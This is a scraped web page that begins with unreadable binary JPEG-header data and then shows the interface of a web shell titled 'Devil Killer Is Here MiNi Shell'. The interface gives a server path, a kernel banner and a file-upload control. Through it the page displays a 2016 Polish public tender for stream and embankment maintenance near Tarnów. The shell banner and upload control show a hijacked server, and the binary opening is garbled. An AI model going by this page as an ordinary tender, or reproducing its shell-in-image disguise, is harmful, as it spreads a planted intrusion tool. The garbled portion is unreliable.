JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20160620/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20160620/93363-N-2016.html

<p class="kh_header"><b>Tarnów: Wykonanie usług konserwacyjnych na terenie powiatu tarnowskiego</b><br>
<b>Numer ogłoszenia: 93363 - 2016; data zamieszczenia: 20.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Zarząd Melioracji i Urządzeń Wodnych w Krakowie Inspektorat Rejonowy w Tarnowie , ul. Ostrogskich 5, 33-100 Tarnów, woj. małopolskie, tel. 014 6376922, faks 014 6376913.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mzmiuw.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usług konserwacyjnych na terenie powiatu tarnowskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia
Część 1 zamówienia
Przedmiotem zamówienia jest wykonanie usługi konserwacji bieżącej dla zadania pn:
Potok Jadownicko - Pojawski w km 0+000 - 9+000 - konserwacja bieżąca 
Zamówienie obejmuje: 
Usunięcie roślinności porastającej dno i skarpy potoku, udrożnienie potoku w km 0+490 - 9+000, mechaniczne hakowanie dna w km 0+720 -6+800, ręczne hakowanie dna w km 6+800 - 9+000. 
Zadanie znajduje się na terenie objętym ochroną przyrody-Obszar Natura 2000 Dębówka nad rzeką Uszewką PLH120066 w km 4+100 - 7+000, Obszar chronionego krajobrazu w km 0+000 - 0+450 i 7+000 - 9+000. Obwód rybacki rzeki Wisła - nr 4 
Część 2 zamówienia
Przedmiotem zamówienia jest wykonanie usługi konserwacji bieżącej dla zadań pn:
- Potok Ostruszanka w km  2+378 - 4+200  -  konserwacja bieżąca 
- Potok Czermianka w km 2+025 - 4+830 - konserwacja bieżąca
- Potok Siekierczynka w km 2+000 - 2+500, 2+950 - 3+220, 3+610 - 3+710 - konserwacja bieżąca
Zamówienie obejmuje:
Potok Ostruszanka -  Rozbiórka tamy bobrowej, wycinka zakrzaczeń na skarpach potoku. Zadanie znajduje się na terenie objętym ochroną przyrody - Park krajobrazowy, Obszar chronionego krajobrazu. Obwód rybacki rzeki Biała Tarnowska - nr 2
Potok Czermianka - Usunięcie roślinności porastającej dno i skarpy potoku, wycinka zakrzaczeń na skarpach potoku, częściowa rozbiórka tam bobrowych. Zadanie znajduje się na terenie objętym ochroną przyrody - Park krajobrazowy, Obszar chronionego krajobrazu.  Obwód rybacki rzeki Wisłoka - nr 1
Potok Siekierczynka - Usunięcie roślinności porastającej skarpy potoku, wycinka zakrzaczeń na skarpach potoku, rozbiórka tamy bobrowej. Zadanie znajduje się na terenie objętym ochroną przyrody - Park krajobrazowy.  Obwód rybacki rzeki Biała Tarnowska - nr 1
Część 3 zamówienia
Przedmiotem zamówienia jest wykonanie usługi konserwacji bieżącej dla zadań pn:
- Potok Poźnianka w km  0+000 - 3+211 -  konserwacja bieżąca
- Potok Lubinka w km 0+000 - 1+230 - konserwacja bieżąca
- Potok Więckówka w km  4+300 - 7+500 -  konserwacja bieżąca
- Potok Zelina Gwożdziecka w km  3+200 - 3+300 -  konserwacja bieżąca
Zamówienie obejmuje:
Potok Poźnianka - Usunięcie roślinności porastającej skarpy potoku, wycinka zakrzaczeń na skarpach potoku, rozbiórka tam bobrowych, odmulenie potoku w km 0+000 - 1+260. Zadanie znajduje się na terenie objętym ochroną przyrody - Natura 2000, Park krajobrazowy, Obszar chronionego krajobrazu. Obwód rybacki rzeki Biała Tarnowska - nr 2
Potok Lubinka - Usunięcie roślinności porastającej skarpy potoku, wycinka zakrzaczeń na skarpach potoku, rozbiórka tamy bobrowej. Zadanie znajduje się na terenie objętym ochroną przyrody - Obszar chronionego krajobrazu. Obwód rybacki rzeki Dunajec - nr 7   
Potok Więckówka - Rozbiórka tam bobrowych, wycinka zakrzaczeń na skarpach potoku. Zadanie znajduje się na terenie objętym ochroną przyrody - Obszar chronionego krajobrazu.  Obwód rybacki rzeki Dunajec - nr 7 
Potok Zelina Gwożdziecka - Rozbiórka tam bobrowych. Zadanie znajduje się na terenie objętym ochroną przyrody - Obszar chronionego krajobrazu. Obwód rybacki rzeki Dunajec - nr 7 
 Część 4 zamówienia
Przedmiotem zamówienia jest wykonanie usługi konserwacji bieżącej dla zadań pn:
- Potok Radlanka w km  4+630 - 5+650 -  konserwacja bieżąca
- Potok Wątok w km 11+600 - 12+200 i 12+850 - 12+900 -  konserwacja bieżąca
Zamówienie obejmuje:
Potok Radlanka - Rozbiórka tam bobrowych. Zadanie znajduje się na terenie objętym ochroną przyrody -Obszar chronionego krajobrazu. Obwód rybacki rzeki Biała Tarnowska - nr 2
 Potok Wątok - Rozbiórka tamy bobrowej. Zadanie znajduje się na terenie objętym ochroną przyrody - Obszar chronionego krajobrazu. Obwód rybacki rzeki Biała Tarnowska - nr 2
 
Część 5 zamówienia
Przedmiotem zamówienia jest wykonanie usługi konserwacji bieżącej dla zadań pn:
Wały rzeki Żabnica-Breń w km: P 11+330-11+650, 11+650-13+410, 14+190-14+200, 14+720-14+730, 15+390-15+400, 15+710-15+720, 15+800-15+810, 15+900-17+200, 17+380-18+270, 20+900-21+300, L: 11+240-11+250, 12+200-12+350, 12+400-12+500, 12+580-12+590 - likwidacja kolein i zaniżenia ramp przejazdowych.
Zamówienie obejmuje:
Naprawa rozszczelnionego rurociągu betonowego dł. 10m przez demontaż i wymianę na rurociąg z rury polietylenowej typu Weholite-Spiro, naprawa okładziny betonowej przyczółka wylotowego, usunięcie popękanego odchylonego przyczółka betonowego wlotowego i zastąpienie go prefabrykowanym żelbetowym przyczółkiem dokowym. Demontaż skorodowanej klapy zwrotnej stalowej O60 i wymiana na  klapę zwrotną skośną O60 wykonaną z polietylenu wysokiej gęstości HDPE, klapa powinna mieć atest producenta o dopuszczalnym nadciśnieniu roboczym minimum 0,3 bar, wymiana ubezpieczenia dna i skarp odpływu i dopływu płytami ażurowymi (palisada z kołków), udrożnienie odpływu i dopływu warstwą do 20 cm wraz z wyprofilowaniem skarp, obsiew mieszanką traw korony i skarp wałów. Wycięcie drzewa 1 szt. (Dąb) wraz z karczunkiem po stronie przyczółka wlotowego. Obiekt przewidziany do naprawy zlokalizowany jest na działkach prywatnych. Dojazd do śluzy wałowej również po działkach prywatnych. Uzyskanie zgód leży po stronie Wykonawcy.

Uwaga (dotyczy cz. 1 - 4 zamówienia):
Zamiar i sposób prowadzenia robót konserwacyjnych na potokach został zgłoszony do Regionalnej Dyrekcji Ochrony Środowiska w Krakowie (kopie zgłoszeń oraz uzgodnienia RDOŚ są załącznikami do SIWZ). Sposób prowadzenia robót musi być zgodny z opisanym w zgłoszeniach i przy zachowaniu wymagań RDOŚ. Zadania wymagają ustanowienia nadzoru przyrodniczego.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości 
dla części 1 zamówienia - 1900 PLN
dla części 2 zamówienia - 600 PLN
dla części 3 zamówienia - 1000 PLN
dla części 4 zamówienia - 300 PLN
dla części 5 zamówienia - 4500 PLN
należy wnieść przed upływem terminu składania ofert. 
Wadium winno być wniesione w:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z   tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( tj. Dz. U. Nr 42, poz. 275 z 2007 r. z późn. zmianami)
Wadium wnoszone w pieniądzu należy przelać na rachunek bankowy zamawiającego: Pekao S.A.  nr konta 48 1240 6292 1111 0010 5126 1194.
Wadium w innej formie niż pieniądz należy złożyć w formie oryginału w siedzibie Zamawiającego w Tarnowie ul. Ostrogskich 5 sekretariat ( I piętro ).
Dowód wpłaty wadium należy dołączyć do oferty. Wadium wnoszone w formie gwarancji lub poręczeń musi spełniać następujące wymogi:
- być wystawione na Małopolski Zarząd Melioracji i Urządzeń Wodnych w Krakowie 
-zawierać w swej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego zawierające oświadczenie, że zaszła jedna z przesłanek wymienionych w art. 46 ust 4a i/lub  5 Ustawy.
- okres ważności wadium nie może być krótszy niż okres związania ofertą</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku zgodnie z formułą spełnienia nie spełnienia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji. Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 1 usługę (potwierdzoną dowodami, że została wykonane należycie):
dla części 1 zamówienia - o wartości nie mniejszej niż 30 000,00 zł (słownie: trzydzieści tysięcy złotych) w zakresie konserwacji bieżącej w korytach cieków wodnych
dla części 2 zamówienia - o wartości nie mniejszej niż 10 000,00 zł (słownie: dziesięć tysięcy złotych) w zakresie konserwacji bieżącej w korytach cieków wodnych
dla części 3 zamówienia - o wartości nie mniejszej niż 17 000,00 zł (słownie: siedemnaście tysięcy złotych) w zakresie konserwacji bieżącej w korytach cieków wodnych
dla części 4 zamówienia - o wartości nie mniejszej niż 7 000,00 zł (słownie: siedem tysięcy złotych) w zakresie konserwacji bieżącej w korytach cieków wodnych
dla części 5 zamówienia - o wartości nie mniejszej niż 70 000,00 zł (słownie: siedemdziesiąt tysięcy złotych) w zakresie konserwacji bieżącej w korytach cieków wodnych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku zgodnie z formułą spełnienia nie spełnienia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji. Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem niniejszego zamówienia na wartość:
dla części 1 zamówienia - o wartości nie mniejszej niż 48 000,00 zł (słownie: czterdzieści tysięcy złotych)
dla części 2 zamówienia - o wartości nie mniejszej niż 15 000,00 zł (słownie: piętnaście tysięcy złotych)
dla części 3 zamówienia - o wartości nie mniejszej niż 26 000,00 zł (słownie: dwadzieścia sześć tysięcy złotych)
dla części 4 zamówienia - o wartości nie mniejszej niż 9 000,00 zł (słownie: dziewięć tysięcy złotych)
dla części 5 zamówienia - o wartości nie mniejszej niż 120 000,00 zł (słownie: sto dwadzieścia tysięcy złotych)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>NIE DOTYCZY</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Warunki płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Strony dopuszczają możliwość zmiany treści umowy w następujących przypadkach:
a.	zmiany w KRS, wpisie do ewidencji działalności gospodarczej lub (CEIDG)  w trakcie realizacji zamówienia;
b.	zmiany kont bankowych,
c.	wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści umowy,
d.	w przypadku ustawowej zmiany stawki podatku od towarów i usług na przedmiot umowy, cena brutto określona w umowie za okresy realizacji umowy przypadające po wprowadzeniu zmienionej stawki podatku od towarów i usług ulegnie odpowiedniej zmianie, w taki sposób, aby wynikająca z umowy cena netto pozostała niezmieniona,
e.	zmian regulacji prawnych obowiązujących w dniu podpisania umowy lub po jej podpisaniu,
f.	zgodnie z art. 144 ust.1 ustawy Prawo zamówień publicznych - dopuszcza się możliwość wprowadzenia innych, nieistotnych zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Zmiana terminów wykonania przedmiotu zamówienia będzie możliwa wyłącznie w przypadku wystąpienia okoliczności niezależnych od Wykonawcy i udokumentowanych w formie pisemnej a mających wpływ na terminy realizacji przedmiotu umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzmiuw.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie zamawiającego ul. Ostrogskich 5, 33-100 Tarnów w sekretariacie pok. nr 9..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.06.2016 godzina 09:30, miejsce: W siedzibie zamawiającego ul. Ostrogskich 5, 33-100 Tarnów w sekretariacie pok. nr 9..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> NIE DOTYCZY.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Potok Jadownicko - Pojawski w km 0+000 - 9+000 - konserwacja bieżąca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi konserwacji bieżącej dla zadania pn:
Potok Jadownicko - Pojawski w km 0+000 - 9+000 - konserwacja bieżąca 
Zamówienie obejmuje: 
Usunięcie roślinności porastającej dno i skarpy potoku, udrożnienie potoku w km 0+490 - 9+000, mechaniczne hakowanie dna w km 0+720 -6+800, ręczne hakowanie dna w km 6+800 - 9+000. 
Zadanie znajduje się na terenie objętym ochroną przyrody-Obszar Natura 2000 Dębówka nad rzeką Uszewką PLH120066 w km 4+100 - 7+000, Obszar chronionego krajobrazu w km 0+000 - 0+450 i 7+000 - 9+000. Obwód rybacki rzeki Wisła - nr 4
